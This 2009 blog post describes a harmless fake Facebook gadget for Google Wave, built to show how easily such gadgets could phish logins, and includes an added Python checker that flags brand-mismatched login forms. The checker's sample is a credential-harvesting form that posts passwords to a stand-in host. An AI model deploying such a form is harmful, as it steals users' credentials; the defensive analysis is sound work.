Oct. 20, 2009

Posted by in Google | 2 comments

Have You Seen the New Facebook Gadget for Google Wave?


The above screenshot shows an actual gadget inside a Wave that I created to demonstrate it. Imagine the possibilities of connecting Facebook with Google Wave. You could post information to your Facebook profile right from within Wave, or connect wave participants to Facebook profiles. If you came across this gadget in a wave you were viewing, wouldn’t you love to at least try it out?

There’s just one problem. The above gadget is fake. Not the screenshot, mind you – if you’re a Google Wave user, you can see the gadget in action by inserting the gadget https://theharmonyguy.com/facebook.xml into a wave. But nothing will happen when you try to connect.

And in this case, truly nothing will happen, since I’ve designed the gadget to be harmless – your login information is not sent anywhere. But I imagine many users would fall prey to such a trick, which could be easily adapted for phishing attacks. Ask yourself honestly, would you have tried to log in? More importantly, if you came across such a gadget in a wave, how would you know whether it came from theharmonyguy.com, facebook.com, or a malicious host?

I post all this to raise a broader point than simply “beware of phishing attacks.” I realize that the balance between security and usability is a constant struggle for developers, or at least should be. Yet I’m somewhat concerned by the patterns we are training users to be accustomed to.

Case in point: chromeless gadgets within a wave that provide no indication of source. In some ways I almost feel that Google Wave is recreating the web browser. Browsers are applications that can load any sort of web page. Google Wave is an application that can load all sorts of web pages within waves. Yet many of the features developed for browsers to warn a user of insecure sites or phishing attacks (even as basic as the address bar, which shows the current domain) are not replicated when a user loads a gadget in Wave. Many have described Wave as a reinvention of e-mail. Reinventing a technology can be very beneficial, but let’s not forget lessons learned in the old technology – there’s a reason most e-mail clients don’t allow iframes and JavaScript, for instance.
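To make the missing "address bar" concrete, here is an added example (my own illustration, not code from the original post or from Google) of the kind of provenance check a Wave client or a gadget reviewer could run before rendering a gadget. It parses a gadget spec in the standard Google Gadgets XML format (Module, ModulePrefs, Content), reports the domain the gadget was loaded from and every domain its content submits to, and flags the combination that matters here: a title that names a brand, a password field, and no host that actually belongs to that brand. The sample gadget, its URLs and the brand-to-domain allowlist are all constructed for the example; they are not the gadget served from theharmonyguy.com.

```python
"""
Provenance check for a Google Gadget spec (the XML format Wave loads).

Added example, not code from the original post. It models the "address bar"
the post says Wave lacks: given the URL a gadget was inserted from and its
XML spec, it reports the hosting domain and flags login-looking content
whose hosts do not match the brand named in the gadget's title.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample: a gadget whose title names Facebook but whose
# content is an inline HTML login form served from, and posting to,
# an unrelated host. Not the gadget from the post.
SAMPLE_GADGET_URL = "https://gadgets.example.invalid/facebook.xml"
SAMPLE_GADGET_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Module>
  <ModulePrefs title="Facebook Connect for Wave">
    <Require feature="wave" />
  </ModulePrefs>
  <Content type="html"><![CDATA[
    <form id="login" action="https://collector.example.invalid/post">
      Email: <input type="text" name="email" />
      Password: <input type="password" name="pass" />
      <input type="submit" value="Connect" />
    </form>
  ]]></Content>
</Module>
"""

# Constructed allowlist for the example: brand names a reviewer cares
# about, mapped to the registrable domains that legitimately own them.
BRAND_DOMAINS = {
    "facebook": {"facebook.com", "fbcdn.net"},
    "google": {"google.com"},
}


def registrable_domain(host):
    """Crude eTLD+1 (last two labels); adequate for the .com/.net demo."""
    labels = host.lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def brands_in_title(title):
    """Return the known brand names mentioned in the gadget title."""
    t = title.lower()
    return sorted(b for b in BRAND_DOMAINS if b in t)


def form_targets(html):
    """Extract form action URLs from inline gadget HTML. A regex is enough
    for the constructed sample; use a real HTML parser on untrusted input."""
    return re.findall(r'<form[^>]*\saction="([^"]+)"', html, flags=re.I)


def check_gadget(gadget_url, gadget_xml):
    """Summarise where a gadget comes from and whether it looks like a
    login form whose hosts do not match the brand it claims."""
    root = ET.fromstring(gadget_xml.encode("utf-8"))
    prefs = root.find("ModulePrefs")
    title = prefs.get("title", "") if prefs is not None else ""
    content = root.find("Content")
    ctype = content.get("type", "html") if content is not None else "html"
    body = (content.text or "") if content is not None else ""

    # Every domain a user would be interacting with: where the spec was
    # fetched from, where a type="url" gadget frames, and where forms post.
    host = urlparse(gadget_url).hostname or ""
    hosts = {registrable_domain(host)}
    if ctype == "url" and content.get("href"):
        hosts.add(registrable_domain(urlparse(content.get("href")).hostname or ""))
    for action in form_targets(body):
        hosts.add(registrable_domain(urlparse(action).hostname or ""))

    asks_for_password = bool(re.search(r'type="password"', body, flags=re.I))
    mismatched = [b for b in brands_in_title(title) if not hosts & BRAND_DOMAINS[b]]
    return {
        "title": title,
        "source_domain": registrable_domain(host),
        "all_domains": sorted(hosts),
        "asks_for_password": asks_for_password,
        "brand_mismatch": mismatched,
        "suspicious": asks_for_password and bool(mismatched),
    }


if __name__ == "__main__":
    for key, value in check_gadget(SAMPLE_GADGET_URL, SAMPLE_GADGET_XML).items():
        print(f"{key}: {value}")
```

The same spec loaded from a facebook.com URL would not be flagged, which is the point: the verdict depends on information (the source and target domains) that the gadget chrome never shows the user, so either the client surfaces it or nobody checks it.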

I’m certainly not the first to raise these concerns; others have previously mentioned the danger of login forms on iGoogle gadgets. Nor am I saying that I don’t want Google Wave to succeed. But if we’re going to reinvent a technology, let’s address some of these basic issues of user expectations and security precautions from the start.

  1. Oh yeah, I could definitely do with a Google wave connected to all social networks (FB, Twitter, LinkedIn, blogs…)

  2. Interested with this idea... says:

    I would rather see Facebook create the gadget themselves and enable it in Wave. That will ensure that the gadget is safe to use. Why not? Likewise for all social networks.


  1. Tweets that mention Have You Seen the New Facebook Gadget for Google Wave? | Social Hacking -- Topsy.com - [...] This post was mentioned on Twitter by theharmonyguy, Bart Hermans. Bart Hermans said: RT @theharmonyguy New Post: Have You ...
  2. Google Wave, so far it’s the answer to a question no one asked. | Things and Stuff - [...] am intrigued by the seemingly total lack of security though.  So is this guy, and he has great points. ...
  3. New Facebook Profile Picture | More More Pics - [...] to your Facebook profile theharmonyguy.com [...]
